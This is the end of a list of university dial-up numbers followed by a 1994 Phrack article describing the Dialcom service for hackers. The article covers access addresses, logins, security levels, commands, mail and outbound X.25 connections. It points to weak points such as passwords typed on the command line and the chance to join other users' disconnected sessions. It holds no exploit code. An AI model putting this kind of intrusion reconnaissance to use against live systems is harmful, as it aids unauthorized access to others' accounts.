  10209.     944-8725
  10210.         9820
  10211.     945-6114
  10212.  
  10213. 814-269-7950    PITT.EDU
  10214.         7970
  10215.     362-7597
  10216.         7558
  10217.     827-4486
  10218.  
  10219. 814-863-0459    PSU.EDU
  10220.         4820
  10221.         9600
  10222.     865-2424
  10223.  
  10224. 816-235-1491    UMKC.EDU
  10225.         1492
  10226.         1493
  10227.         6020
  10228.  
  10229. 818-701-0478    CSUN.EDU
  10230.  
  10231. 901-678-2834    MEMST.EDU
  10232.  
  10233. 904-392-5533    UFL.EDU
  10234.  
  10235. 904-646-2772    UNF.EDU
  10236.         2735
  10237.  
  10238. 906-487-1530    MTU.EDU
  10239.  
  10240. 907-474-0772    ALASKA.EDU
  10241.     789-1314
  10242.  
  10243. 908-571-3555    MONMOUTH.EDU
  10244.  
  10245. 908-932-4333    RUTGERS.EDU
  10246.  
  10247. 909-595-3779    CSUPOMONA.EDU
  10248.  
  10249. 909-595-5993    CALPOLY.EDU
  10250.     598-7104
  10251.  
  10252. 909-621-8233    HMC.EDU
  10253.  
  10254. 909-621-8455    POMONA.EDU
  10255.         8332
  10256.  
  10257. 909-621-8361    CLAREMONT.EDU
  10258.         8313
  10259.         8108
  10260.         8509
  10261.  
  10262. 909-880-8833    CSUSB.EDU
  10263.  
  10264. 913-864-5310    UKANS.EDU
  10265.     897-8650
  10266.         
  10267. 916-456-1441    CSUS.EDU
  10268.     737-0955
  10269.  
  10270. 916-752-7900    UCDAVIS.EDU
  10271.         7920
  10272.         7950
  10273.  
  10274. 916-894-3033    CSUCHICO.EDU
  10275.  
  10276. 919-681-4900    DUKE.EDU
  10277.  
  10278. 919-759-5814    WFU.EDU
  10279.  
  10280. 919-962-9911    UNC.EDU
  10281.  
  10282. -----------------------------------------------------------------------------
  10283.  
  10284. Canada
  10285.  
  10286. 204-275-6100    umanitoba.ca
  10287.         6132
  10288.         6150
  10289. 306-586-5550    University of Regina
  10290. 306-933-9400    University of Saskatchewan
  10291. 403-492-0024    University of Alberta
  10292.         0096
  10293.         3214
  10294. 416-978-3959    University of Toronto
  10295.         8171
  10296. 418-545-6010    Universite du Quebec a Chicoutimi
  10297. 418-656-7700    laval u
  10298.         3131
  10299.         5523
  10300. 506-453-4551    University of New Brunswick
  10301.         4560
  10302.         4609
  10303.     452-6393
  10304. 514-285-6401    uquebec.ca
  10305. 514-340-4449    polymtl.ca
  10306.         4450
  10307.         4951
  10308.     343-2411
  10309. 514-398-8111    McGill University
  10310.         8211
  10311.         8711
  10312. 514-733-2394    Universite de Montreal
  10313.         1271
  10314.         0832
  10315. 514-343-2411
  10316.         7835
  10317. 514-848-8800    concordia.ca
  10318.         7494
  10319.         8828
  10320.         4585
  10321.         8834
  10322.         7370
  10323. 519-661-3511    University of Western Ontario
  10324.         3512
  10325.         3513
  10326. 519-252-1101    Windsor University
  10327. 519-725-5100    University of Waterloo
  10328.         1392
  10329. 604-291-4700    simon fraser u
  10330.         4721
  10331.         5947
  10332. 604-721-2839    univ of victoria
  10333.         6148
  10334. 604-822-9600    University of British Columbia
  10335. 613-788-3900    Carleton University
  10336.     564-5600
  10337. 613-548-8258    Queen's University
  10338.     545-0383
  10339. 613-564-3225    University of Ottawa
  10340.         5926
  10341. 613-230-1439    York University
  10342. 705-741-3350    Trent University
  10343.         3351
  10344.         4637
  10345. 709-737-8302    Memorial Univ. of Newfoundland
  10346. 807-346-7770    Lakehead University
  10347. 819-569-9041    usherb.ca
  10348.     821-8025
  10349. 819-822-9723    bishop u
  10350. 819-595-2028    Universite du Quebec a Hull
  10351. 902-542-1585    acadiau.edu
  10352. 902-425-0800    tuns.ca
  10353.     420-7945
  10354. 902-429-8270    Saint Mary's University
  10355. 902-494-2500    Dalhousie University
  10356.         8000
  10357. 902-566-0354    University of Prince Edward Island
  10358. 905-570-1889    McMaster University
  10359.         1046
  10360.  
  10361. -----------------------------------------------------------------------------
  10362.  
  10363. The Rest of the World
  10364.  
  10365. 31-40-435049    tue.nl
  10366.       455215
  10367.       430032
  10368. 34-1-582-1941   Facultad de Odontologia
  10369.    3-333-9954   Barcelona Polytechnic
  10370.          8991   Univ of Barcelona
  10371.      581-2091
  10372.      691-5881   Polytechnic University
  10373. 34-7-656-6553   Univ of Zaragosa
  10374.          0108
  10375.          6654
  10376. 44-3-34-2755    st-andrews.ac.uk
  10377. 44-71-413-0790  birkbeck college
  10378. 44-524-843878   lancashire
  10379. 44-785-214479   staffs.ac.uk
  10380. 49-621-292-1020 uni-mannheim.de
  10381.        121-0251
  10382. 49-631-205-2150 uni-kl.de
  10383.            3554
  10384.            3629
  10385.            3630
  10386. 49-8421-5665    ku-eichstett.de
  10387. 49-8452-70035   tu-muenchen.de
  10388. 61-8-223-2657   Univ of Adelaide
  10389. 61-9-351-9544   Curtin U
  10390. 61-9-381-1630   uwa.edu.au
  10391.          2200
  10392.          3054
  10393. 82-2-962        kaist.ac.kr
  10394. 886-2-363-9529  NAT TECH U, TAIWAN
  10395.                               ==Phrack Magazine==
  10396.  
  10397.                  Volume Five, Issue Forty-Six, File 14 of 28
  10398.  
  10399. ****************************************************************************
  10400.  
  10401.               A   L I T T L E   A B O U T   D I A L C O M
  10402.               *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
  10403.  
  10404.                                    by
  10405.  
  10406.                                Herd Beast
  10407.  
  10408.                           (hbeast@phantom.com)
  10409.  
  10410. Introduction
  10411. ~~~~~~~~~~~
  10412.  
  10413. Dialcom is an interesting system for hackers for two reasons:
  10414. First, it is used by business people, reporters and many other world
  10415. wide, and it offers a variety of information services, from a
  10416. bulletin board to stock market updates and news services.  Second,
  10417. Dialcom runs on Prime machines, so using Dialcom is a good way to
  10418. learn Prime.  True, it's not the best, as access is generally restricted,
  10419. but it's better than, say, learning VMS from Information America.
  10420.  
  10421. In these days, where everyone seems to be so centered about the
  10422. Internet and the latest Unix holes, it's important to remember that the
  10423. information super-highway is not quite here, and many interesting things
  10424. are out there and not on the Internet.  Phrack has always been a good place
  10425. to find out more about these things and places, and I wrote this article
  10426. after reading the Dialog articles in Phrack.
  10427.  
  10428. Well, gentle reader, I guess that my meaning-of-life crap quota is full,
  10429. so let's move on.
  10430.  
  10431. Accessing Dialcom and Logging In
  10432. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  10433.  
  10434. Dialcom is accessible world-wide.  It offers connection to Tymnet, Sprintnet,
  10435. and other networks as well as dialin modems.  Since I am not writing to
  10436. Washington people only, I will specify only the easiest methods -- Tymnet
  10437. and Sprintnet -- and some of the more interesting access methods.
  10438.  
  10439. Dialcom is basically a Primecom network.  Each user has an account on
  10440. one or more of the systems connected to that network.  To access Dialcom,
  10441. the user needs to access the machine his account is on.  First, he logs
  10442. into a public data network and follows the steps required to connect to
  10443. a remote note.  On Tymnet, this means getting to the "please log in:"
  10444. prompt, and on Sprintnet it's the famous '@' prompt.
  10445.  
  10446. For Tymnet, you must enter at the prompt: DIALCOM;<system number>
  10447. (eg, DIALCOM;57).  The same goes for TYMUSA connection from outside
  10448. the USA.
  10449.  
  10450. For Sprintnet or other PADs, you must enter the correct NUA:
  10451.  
  10452.    System #         Sprintnet NUA         Tymnet NUA
  10453.    ========         =============        =============
  10454.      XX             3110 301003XX        3106 004551XX
  10455.    (32, 34,
  10456.     41 - 46,
  10457.     50, 52,
  10458.     57, 61,
  10459.     63, 64)
  10460.  
  10461. It should be noted that Dialcom keeps its own X.25 network, Dialnet,
  10462. and the NUAs on it are those of the systems (connect to address "57"
  10463. for system 57).
  10464.  
  10465. Dialcom has other access methods, meant to be used from outside the
  10466. USA, but sometimes available from within as well.
  10467.  
  10468. One is a COMCO card, which is inserted into a reader connected to the
  10469. computer and the modem through a serial link.  The user then calls a
  10470. special dial-up number, and can connect to Dialcom (or any other NUA).
  10471. The card contains a number of "tax units" which are deducted as the
  10472. connection goes through, until they are exhausted and the card is useless.
  10473. The user calls the dial-up and types in ".<CR>".  The amount of tax units
  10474. on the card will then appear on the screen, and the user can connect to a
  10475. host.  COMCO dial-ups:
  10476.  
  10477.                 Location                                Number
  10478.           =======================                   ==============
  10479.           Australia                                 +61-02-2813511
  10480.           Belgium                                   +32-02-5141710
  10481.           France                                    +33-1-40264075
  10482.           West Germany                              +49-069-290255
  10483.           Hong Kong                                 +852-5-8611655
  10484.           Netherlands                               +31-020-6624661
  10485.           Switzerland                               +41-022-865507
  10486.           United Kingdom                            +45-01-4077077
  10487.           USA (Toll Free)                           +1-800-777-4445
  10488.           USA                                       +1-212-747-9051
  10489.  
  10490. The other way is through Infonet.  I will not turn this into an Infonet
  10491. guide, save to write the logon sequence needed to access Dialcom.
  10492. At the '#' prompt, enter 'C'.  At the "Center:" prompt, enter "DC".
  10493. Dialcom NUAs are 31370093060XX, where XX is the system number.
  10494.  
  10495. Once the connection to a Dialcom system has been established, you will
  10496. be greeted by the Prime header:
  10497.  
  10498. Primecom Network 19.4Q.111 System 666
  10499.  
  10500.  Please Sign On
  10501. >
  10502.  
  10503. And the '>' prompt.  This is a limited prompt as most commands cannot
  10504. be issued at it, so you need to login.
  10505.  
  10506. Dialcom user id's are typically 3 alphabetic characters followed by
  10507. several digits.  The password may contain any character except for
  10508. ",;/*" or spaces, and my experience shows that they tend to be of
  10509. intermediate complexity (most will not be found in a dictionary, but
  10510. could be cracked).
  10511.  
  10512. Password security may become useless at this point, because the Dialcom
  10513. Prime systems allow ID to take both user id and password as arguments
  10514. (which some other Primes do not) and in fact, Dialcom tutorials tell
  10515. users to log on like this --
  10516.  
  10517. >ID HBT007 IMEL8
  10518.  
  10519. -- which makes ``shoulder surfing'' easier.
  10520.  
  10521. One you log on, you will see:
  10522.  
  10523. Dialcom Computer Services 19.4Q.111(666)
  10524. On At 14:44 07/32/94 EDT
  10525. Last On At 4:09 06/44/94 EDT
  10526.  
  10527. >
  10528.  
  10529. And again, the '>' prompt.
  10530.  
  10531. >off
  10532. Off At 14:45 07/32/94 EDT
  10533. Time used: 00h 00m connect, 00m 01s CPU, 00m 00s I/O.
  10534.  
  10535. Security at Dialcom
  10536. ~~~~~~~~~~~~~~~~~~
  10537.  
  10538. As mentioned, while passwords are relatively secure, the manner in
  10539. which they are entered is usually not.
  10540.  
  10541. As for the accounts themselves, it's important to understand the
  10542. general way accounts exist on Dialcom.  Dialcom users are usually
  10543. part of a business that has an ``account group'' on Dialcom.  Each
  10544. user gets an account from that group (HBT027, HBT054).  Each group
  10545. also has a group administrator, who controls what each account can
  10546. access.  The administrator determines which programs (provided by Dialcom)
  10547. each user can access.  A foreign correspondent for a magazine might
  10548. have access to the news services while other users might not.  The
  10549. administrator also determines how much the user can interface with
  10550. the Prime OS itself.  Each user can run a few basic commands (list
  10551. files, delete, sign off) but above that, it's up to the administrator.
  10552. The administrator may opt to remove a user from the controlling menuing
  10553. system -- in which case, the user has no restrictions forced upon him.
  10554.  
  10555. Group administrators, however, handle only their groups, and not the
  10556. Dialcom system.  They need, for example, to notify Dialcom staff if
  10557. they want an account removed from the system.
  10558.  
  10559. Another (different yet combined) part of the account/group security
  10560. are accounts' ``security levels'' (seclevs).  Seclevs range from 3
  10561. to 7, and determine the access an account has to various places.
  10562. Seclev 4 users, for example, are not restricted to seeing only users
  10563. of their group on the system, and can delete accounts from the menuing
  10564. system.
  10565.  
  10566. User accounts own their directories and files within (but high seclevs
  10567. can read other users' files).  Each account's security is left in some
  10568. extent to its owner, in that the user sets his own password.  When
  10569. setting a password, a user can set a secondary password.  Any user wishing
  10570. to access that user's directory will need that password.  Furthermore,
  10571. the user can allow other users to attach as owners to his directory if
  10572. they know his password (come to think of it, couldn't they just login
  10573. as him?).  This is all controlled by the PASSWD program (see ``Common
  10574. Commands'', below).
  10575.  
  10576. Dialcom also allows for login attempt security using the NET_LOCK
  10577. program.  NET_LOCK blocks login attempts from addresses that have
  10578. registered too many login failures over a period of time (the default
  10579. being blocking for 10 minutes of addresses that have registered more
  10580. than 10 failed login within 5 minutes).  NET_LOCK -DISPLAY is accessible
  10581. to users of Seclev 5 and shows addresses currently blocked and general
  10582. information.  Other options are accessible to Seclev 7 and are:
  10583. -ON, -OFF, -ATTEMPTS (number of attempts so that NET_LOCK will block
  10584. an address), -LOCK_PERIOD (the period in which these attempts must
  10585. occur), -LOCK_TIME (time to block), -WINDOW (a time window in which the
  10586. lockout feature is disabled).
  10587.  
  10588. A little unrelated is the network reconnect feature of the Prime
  10589. computers.  When a user gets disconnected from the system because
  10590. of a network failure, or for any other reason which is not the
  10591. system's fault, he can log back in and reconnect into the disconnected
  10592. job.  When this happens, the user sees, upon logging on:
  10593.  
  10594.  
  10595. You Have a Disconnected Job:
  10596.  
  10597.   HBT007               d09   1  109   NT   NETLINK  989898989    6 3
  10598.  
  10599. Do You Want to Reconnect?
  10600.  
  10601. Which means user's HBT007 job #9 (a NETLINK command) is waiting for
  10602. a reconnection.  At this point, the user can continue, leaving the
  10603. job to hang until the system signs it off when a certain amount of
  10604. time expires; sign the job off himself; or reconnect to that job.
  10605. (Try "HELP" at the prompt.)  This wouldn't be important, but experience
  10606. shows that many disconnections occur when someone logs into Dialcom
  10607. over a network, and then uses NETLINK (or another program) to connect
  10608. to another site over a network, and somewhere, some time, he issues
  10609. a control sequence (let's say to tell NETLINK to do something) that
  10610. gets processed by the first network, which logs him off.  So there
  10611. is potential to log into the middle of people's sessions (yeah, like
  10612. detached ttys).
  10613.  
  10614. Common Commands
  10615. ~~~~~~~~~~~~~~
  10616.  
  10617. Common commands are in reality the basic Prime commands that every
  10618. account has access to.  Here they are, in alphabetical order.
  10619.  
  10620. `CLEAR' Clear the screen.
  10621.  
  10622. `DATE'  Shows the date at which a command was entered.  Output:
  10623.  
  10624.         >DATE
  10625.         Proceed to next command
  10626.  
  10627.         >BAH
  10628.  
  10629.         Friday, June 38, 1994 10:01:00 AM EDT
  10630.  
  10631. `DEL'   Deletes a file.
  10632.  
  10633. `DELP'  Deletes several files based on wildcards.  Can verify deletion
  10634.         of every file, and delete only file modified before, after, or
  10635.         between certain dates.
  10636.  
  10637. `ED'    Is the default and simplest file editor on Dialcom (some of its
  10638.         brothers are JED and FED).  Once invoked, ED enters INPUT mode,
  10639.         in which the user just types text.  To enter EDIT mode, where
  10640.         you can issue commands, you need to press <CR> on a blank line
  10641.         (the same thing will get you from EDIT mode back to INPUT mode).
  10642.         The EDIT mode uses a pointer to a line.  All commands are carried
  10643.         on the line that the pointer points to.  "T" will bring the
  10644.         pointer to the top of the text, "B" to the bottom, "N" to the
  10645.         next line down, "U" to the next line up, and "L <word>" to
  10646.         the line containing <word>.  ED commands include:
  10647.  
  10648.         P:     PRINT the pointer line.  P<number> will print <number>
  10649.                of lines.
  10650.         C:     Change words.  The format is "C/old word/new word".
  10651.         A:     Appends words.  The format is "A <words>".
  10652.         R:     Retype pointer line.  The format is "R <new line>".
  10653.         SP:    Check the spelling of the text, and then point to
  10654.                the top of the text.
  10655.         SAVE:  Will save the text and exit ED.
  10656.         Q:     Will quit/abort editing and exit ED.
  10657.  
  10658. `F'     List all file info.  Output:
  10659.  
  10660.         DIALCOM.TXT  001  13/30/94  13:50  ASC  D W R
  10661.  
  10662.         Which means file name "DIALCOM.TXT", size of 1 file blocks,
  10663.         lat modified on 13/30/94 at 13:50, is an ASC type file, and
  10664.         the account has the permissions to D(elete), W(rite), and
  10665.         R(ead) it.
  10666.  
  10667. `HELP' (`?')  Displays a nicely formatted menu of available commands.
  10668.  
  10669. `INFO'  System info.  INFO <info-file-name> displays an information
  10670.         file, for example, INFO NETLINK.
  10671.  
  10672.         "INFO ?" lists info files.
  10673.         "INFO BRIEF" lists info files grouped by application
  10674.         "INFO INFO" lists info files with their descriptions.
  10675.  
  10676. `L'     List all file names.  Output:
  10677.  
  10678.         <S666-6>HBT007 (Owner)
  10679.  
  10680.         DIALCOM.TXT
  10681.  
  10682. `LS'    Display information about available segments and the account's
  10683.         access to them.  Output:
  10684.  
  10685.         2 Private static segments.
  10686.         segment access
  10687.         --------------
  10688.         4000    RWX
  10689.         4001    RWX
  10690.  
  10691.         11 Private dynamic segments.
  10692.         segment access
  10693.         --------------
  10694.         4365    RX
  10695.         4366    RX
  10696.         4367    RWX
  10697.         4370    RWX
  10698.         4371    RX
  10699.         4372    RWX
  10700.         4373    RX
  10701.         4374    RWX
  10702.         4375    RX
  10703.         4376    RX
  10704.         4377    RWX
  10705.  
  10706. `NAME'  Changes UFD name.  Output:
  10707.  
  10708.         >NAME
  10709.  
  10710.         Old Name: John Gacy
  10711.         UFD Name: Herd Beast
  10712.         All done
  10713.  
  10714.         >WHO
  10715.  
  10716.         Herd Beast <S666-6>HBT007
  10717.  
  10718. `NETWORK'  Accesses a database that contains dial-up number for Sprintnet,
  10719.            Tymnet, Datapac and Dialcom's Dialnet by State/City.
  10720.  
  10721. `OFF'   Sign off the system.
  10722.  
  10723. `ONLINE' Who's online?  The amount of data displayed depends on the
  10724.          account's seclev.  Seclevs below 4 are restricted to seeing
  10725.          only users of their group.  Output:
  10726.  
  10727.          HBT007      PRK017      MJR
  10728.  
  10729. `PAD'   Allows you to send commands to an X.29 PAD, these commands
  10730.         being the SET/SET?/PAR? commands and their parameter/value
  10731.         pairs.
  10732.  
  10733. `PASSWD' Change your password.  PASSWD has two forms: a short one,
  10734.          which just changes the user's password, and a long form,
  10735.          invoked by PASSWD -LONG, which allows the user to set
  10736.          a second password for other users accessing his directory,
  10737.          and also to determine if they can have owner access to
  10738.          the directory.
  10739.  
  10740. `PROTECT'  Protects a file (removes permissions from it).
  10741.  
  10742.            "PROTECT DIALCOM.TXT" will remove all three (D, W, R)
  10743.            attributes from it.  This will result in:
  10744.  
  10745.            >DEL DIALCOM.TXT
  10746.            Insufficient access rights.  DIALCOM.TXT (DEL:10)
  10747.  
  10748.            But --
  10749.  
  10750.            >DELETE DIALCOM.TXT
  10751.            "DIALCOM.TXT" protected, ok to force delete? y
  10752.  
  10753. `SECLEV' Your security level.  Output:
  10754.  
  10755.          Seclev=5
  10756.  
  10757. `SIZE'  Size information about a file.  Output:
  10758.  
  10759.         1 Block, 404 Words
  10760.  
  10761. `STORAGE'  Shows storage information.
  10762.  
  10763. `SY'    Show users on system.  (Same restrictions as for ONLINE apply.)
  10764.         Will show user name, time on, idle time, devices used, current
  10765.         jobs and state, etc.  Output:
  10766.  
  10767.     41 Users on sys 666
  10768.  
  10769.  Names    use idle mem State command    object    devs
  10770.  
  10771.  HBT007   *11   0  155   R1   SY                   6 3  from Tymnet via X.25
  10772.  
  10773.  
  10774. `SYS'   Displays account information and system number.  Output:
  10775.  
  10776.         <S666-6>HBT007  on system 666.
  10777.  
  10778. `TERM'  Used to tell the Dialcom computer what terminal the user is
  10779.         using.  A list of supported terminals is generated by "TERM
  10780.         TERMINALS".  TERM options are:
  10781.  
  10782.         TYPE <terminal type>         (TYPE VT100)
  10783.         WIDTH <width>                (Terminal width, if different
  10784.                                       than default)
  10785.         TOP                          (Start listings at top of screen)
  10786.         PAUSE                        (Pause listings when screen is
  10787.                                       full)
  10788.  
  10789.         -ERASE, -KILL <char>         (Sets the erase or kill character)
  10790.         -BREAK <ON|OFF>              (Enables or disables BREAKs)
  10791.         -HALF or -FULL               (Half duplex of full duplex)
  10792.         -DISPLAY                     (Output current terminal information)
  10793.  
  10794. `WHO'   Displays account information.  Output:
  10795.  
  10796.         <S666-6>HBT007
  10797.  
  10798.         Which means user HBT007 on system 666 on device 6.
  10799.  
  10800. Communicating on Dialcom
  10801. ~~~~~~~~~~~~~~~~~~~~~~~
  10802.  
  10803. Users who want to communicate on Dialcom have two choices, basically.
  10804. These are the Dialcom bulletin board and electronic mail.  The Dialcom
  10805. bulletin board has two versions.  The first consists of several message
  10806. bases (called ``categories'') which are shared between some Dialcom
  10807. systems (and mostly used by bored employees, it seems); there are also
  10808. private bulletin boards, which are not shared between the systems.  They
  10809. belong to account groups, and only users in an account group can access
  10810. that group's bulletin board system.  These version of the Dialcom board
  10811. are often empty (they have no categories defined and hence are unusable).
  10812.  
  10813. This is accessed by the command POST (PRPOST for the private board).
  10814. Once POST is activated, it will display a prompt:
  10815.  
  10816. Send, Read or Purge:
  10817.  
  10818. If the answer is READ, POST will ask for a category (a list of categories
  10819. will be displayed if you type HELP at that prompt).  Once a category
  10820. has been joined, you will be able to read through the messages there:
  10821.  
  10822. Subject:  ?
  10823. From:  HBT007             Posted:  Sat  32-July-94  16:47    Sys 666
  10824.  
  10825. quit
  10826. /q
  10827. /quit
  10828.  
  10829. Continue to Next Item?
  10830.  
  10831. Answering SEND at the first prompt will allow you to send a message in a
  10832. category.
  10833.  
  10834. Answering PURGE will allow you to delete messages post by your account.
  10835. When you enter PURGE and the category to purge message from, the system
  10836. will show you any posts that you are allowed to purge, followed by a
  10837. "Disposition:" prompt.  Enter DELETE to delete the message.
  10838.  
  10839. The second way to communicate is the Dialcom MAIL system.  MAIL allows
  10840. sending and receiving messages, it allows for mailing lists, filing
  10841. mail into categories, holding mail to read later and so on.  MAIL is
  10842. invoked by entering, uh... oh, yes, MAIL.
  10843.  
  10844. It works along similar lines to those of POST, and will display the following
  10845. prompt:
  10846.  
  10847. Send, Read or Scan:
  10848.  
  10849. SEND:  Allows you to send a message.  It will prompt with "To:",
  10850. "Subject:" and "Text:" (where you enter the actual message, followed
  10851. by ".SEND" on a blank line to end).  After a message is sent, the
  10852. "To:" prompt will appear again -- use "QUIT" to leave it.
  10853.  
  10854. A word about the "To:" prompt.  There are two configuration files which
  10855. make its use easier.  First the MAIL.REF file, which is really a mailing
  10856. list file.  It contains entries in the format of --
  10857.  
  10858.         <Nick> <Accounts>
  10859.         DOODZ DVR014 ABC0013 XYZ053
  10860.  
  10861. -- and at the "To:" prompt, you can just enter "DOODZ" and the message
  10862. will be sent to all three accounts.  When you enter a name, MAIL searches
  10863. through your MAIL.REF, and then through the account administrator's, and
  10864. only then parses it as an account name.  Second is the mail directory,
  10865. which contains the names and account IDs of many users the account is
  10866. in contact with.  To display it, type "DIS DIR" at the first prompt.
  10867. You'll get something like this:
  10868.  
  10869. HERD-BEAST            6666:HBT007      WE'RE BAD AND WE'RE KRAD
  10870.  
  10871. Which means you can type "HERD-BEAST" at the prompt, and not just
  10872. HBT007.  Also, there are special options for the "To:" prompt, most
  10873. notable are: CC to send a carbon copy; EX to send the message with
  10874. ``express priority''; DAR to request that if the message is sent
  10875. to a user on another Dialcom system, POSTMASTER will send you a
  10876. message verifying that your message has been sent; and NOSHOW,
  10877. to keep the receiver from seeing everybody else on the "To:" list.
  10878. For example (all these people are in the mail directory),
  10879.  
  10880.         To: DUNKIN D.DREW CC FOLEY NOSHOW EX
  10881.  
  10882. You enter the message about to be sent at the "Text:" prompt.  That
  10883. mode accepts several commands (like .SEND), all of which begin with a
  10884. dot.  Any command available at the "To:" prompt is available here.
  10885. For example, you can add or remove names from to "To:" field using
  10886. ".TO <ids>" or ".TO -<ids>", and add a CC using ".CC <id>".
  10887. You also have a display command, ".DIS".  ".DIS" alone shows the text
  10888. entered so far; ".DIS TO" shows the "To:" field; ".DIS HE" shows
  10889. the entire header; etc.  Finally, you have editing option.  ".ED" will
  10890. load editing mode, so you can change the text you entered.  ".LOAD
  10891. <filename>" will load <filename> into the text of the message.  ".SP"
  10892. will check the spelling of text in the message, and there are other
  10893. commands.
  10894.  
  10895. READ:  Allows you to read mail in your mailbox.  Once you enter READ,
  10896. MAIL will display the header of the first message in your mailbox
  10897. (or "No mail at this time") followed by a "--More--" prompt.  To
  10898. read the message, press <CR>; otherwise, enter NO.  After you are done
  10899. reading a message, you will be prompted with the "Disposition:" prompt,
  10900. where you must determine what to do with the message.  There you can enter
  10901. several commands:  AGAIN to read the message again;  AG HE to read the
  10902. header again; AP REPLY to reply to the message and append the original
  10903. message to the reply; AP FO to forward the message to someone and add
  10904. your comments to it; REPLY to reply to the sender of the message; REPLY
  10905. ALL to reply to everybody on the "To:" field; FILE to file the message;
  10906. SA to save the message into a text file; NEXT to read the next message
  10907. in your mailbox; and D to delete the message.
  10908.  
  10909. SCAN:  Allows you see a summary of the messages in the mailbox.  Both
  10910. READ and SCAN have options that allow you to filter the messages you
  10911. want to read:  FR <ids> to get only messages from <ids>; TO <ids> to
  10912. get only messages sent to <ids>; 'string' to get only messages containing
  10913. ``string'' in the "Subject:" field; "string" to get only messages
  10914. containing ``string'' in the message itself; FILE CATEGORY to get only
  10915. messages filed into ``CATEGORY''; and DA Month/Day/Year to get only messages
  10916. in that date (adding a '-' before or after the date will get you everything
  10917. before or after that date, and it's also possible to specify two dates
  10918. separated by a '-' to get everything between those dates.  For example,
  10919. to get all of Al Gore's messages about Clipper before August 13th:
  10920.  
  10921.         READ FILE CLIPPER FR GOR 'Great stuff' DA -8/13/94
  10922.  
  10923. There is also a QS (QuickScan) command that behaves the same as SCAN,
  10924. only SCAN shows the entire header, and QS just shows the "From:" field.
  10925.  
  10926. However, there is more to do here than just send, read or scan.
  10927. Some of it was mentioned when explaining these commands.  Both sent
  10928. and received messages can be saved into a plain text file or into
  10929. a special mailbox file, called MAIL.FILE.  Messages filed into the
  10930. MAIL.FILE can be grouped into categories in that file.
  10931.  
  10932. SAVING MESSAGES:  Messages are saved by entering "SA filename" at a
  10933. prompt.  For sent message, it's the "Text:" prompt, while entering the
  10934. message, and the command is ".SA", not "SA".  For received message, it's
  10935. either the "--More--" or the "Disposition:" prompt.
  10936.  
  10937. FILING MESSAGES:  Messages are filed in two cases.  First, the user
  10938. can file any message into any directory, and second, the system files
  10939. read messages that lay in the mailbox for over 30 days.  Received messages
  10940. are filed by entering "FILE" at the "Disposition:" prompt.  This files
  10941. the message into a miscellaneous category called BOX.  If an optional
  10942. <category-name> is added after "FILE", the message will be filed into
  10943. that category.  If <category-name> doesn't exist, MAIL can create it
  10944. for you.  After a message has been filed, it's not removed from the
  10945. mailbox -- that's up to the user to do.  Sent messages behaved the same
  10946. way, but the command is ".FILE" from the "Text:" prompt.
  10947.  
  10948. To display categories of filed mail, enter DIS FILES at a prompt.  To
  10949. read or scan messages in filed, just add "FILE <category-name> after
  10950. the command (READ, SCAN, etc).  To delete a category, enter D FILE
  10951. <category-name>.  To delete a single message in a category, just use
  10952. D as you would on any other message, after you read it from the
  10953. MAIL.FILE.
  10954.  
  10955. Connecting via Dialcom
  10956. ~~~~~~~~~~~~~~~~~~~~~
  10957.  
  10958. Dialcom allows its customers to access other systems through it.
  10959. There are some services offered specifically through Dialcom, such as
  10960. the BRS/MENUS service, which is an electronic library with databases
  10961. about many subjects, Telebase's Cyclopean Gateway Service, which offers
  10962. access to many online database services (like Newsnet, Dialog and even BRS)
  10963. and more.  These services have a direct connection to Dialcom and software
  10964. that maps Dialcom user ids to their own ids (it's not usually possible for
  10965. someone to access one of these services without first connecting to Dialcom).
  10966.  
  10967. Another method is general connection to X.25 addresses.  Since Dialcom
  10968. is connected to X.25, and it allows users to use the Prime NETLINK
  10969. commands, it's possible to PAD out of Dialcom!!#!
  10970.  
  10971. NETLINK is invoked by entering NETLINK.  NETLINK then displays its own,
  10972. '@' prompt.  The commands available there are QUIT, to quit back to
  10973. the OS; CONTINUE, to return to an open connection; CALL, to call an
  10974. address; and D, to disconnect an open connection.
  10975.  
  10976. CALL takes addresses in several formats.  A system name, to connect to
  10977. a Dialcom system, or an address in the format of DNIC:NUA.  For example,
  10978.  
  10979. @ CALL :666
  10980. Circuit #1
  10981. 666 Connected
  10982. [...]
  10983.  
  10984. @ CALL 3110:21300023
  10985. Circuit #2
  10986. 21300023 Connected
  10987. [...]
  10988.  
  10989. NETLINK establishes connections in the form of circuits.  A circuit can
  10990. be broken out of into command mode (the '@' prompt), using "<CR>@<CR>",
  10991. and another can be opened, or parameters can be changed, etc.
  10992. NETLINK has other commands, to log connections into a file, or set PAD
  10993. parameters (SET, PAR), or turn on connection debugging, or change
  10994. the default '@' prompt, and more.
  10995.  
  10996. Things to Do on Dialcom
  10997. ~~~~~~~~~~~~~~~~~~~~~~
  10998.  
  10999. Much of what Dialcom offers was not covered until now and will not
  11000. be covered.  That's because most the services could use a file each,
  11001. and because many account groups have things enabled or disabled
  11002. just for them.  Instead, I will write shortly about two of the more
  11003. interesting things online, the news service and clipping service,
  11004. and add pointers to some interesting commands to try out.
  11005.  
  11006. The news service, accessed with the NEWS command, is a database of
  11007. newswires from AP, Business Wire, UPI, Reuters and PR Newswire.
  11008. The user enters the database, and can search for news by keywords.
  11009.  
  11010. After entering NEWS, you will see a menu of all the news agencies.
  11011. Once you choose an agency, you will enter its menu, which sometimes
  11012. contains a copyright warning and terms of usage and also the list
  11013. of news categories available from that agency (National, North America,
  11014. Business, Sports, etc).  Once you choose the category, you will be
  11015. asked for the keyword to search for.  If a story (or several stories) was
  11016. found containing your desired keyword, you can read through the
  11017. stories in the order of time, or the order they appear, or reverse
  11018. order and so on, and finally mail a story to yourself, or enter new
  11019. search keywords, or jump to another story, or simply quit.
  11020.  
  11021. The news clipping service, available with the command NEWSTAB, allows
  11022. the user to define keyword-based rules for selecting news clippings.
  11023. The system then checks every newswire that passes through it, and if
  11024. it matches the rules, mails the newswire to the user.
  11025.  
  11026. After entering NEWSTAB, you are presented with a menu that allows you
  11027. to show, add, delete, and alter your rules for choosing news.  The rules
  11028. are made using words or phrases, logical operators, wildcards and
  11029. minimal punctuation.  A rule can be as simple as "HACKING", which will
  11030. get every newswire with the word "hacking" in it mailed to you, or
  11031. if you want to be more selective, "NASA HACKING".  Logical operators
  11032. are either AND or OR.  For example, "HACKING AND INTERNET".  Wildcards
  11033. are either '*' or '?' (both function as the same).  They simple replace
  11034. any number of letters.  Punctuation is permitted for initials,
  11035. abbreviations, apostrophes or hyphens, but not for question marks and
  11036. similar.  All of this is explained in the NEWSTAB service itself.
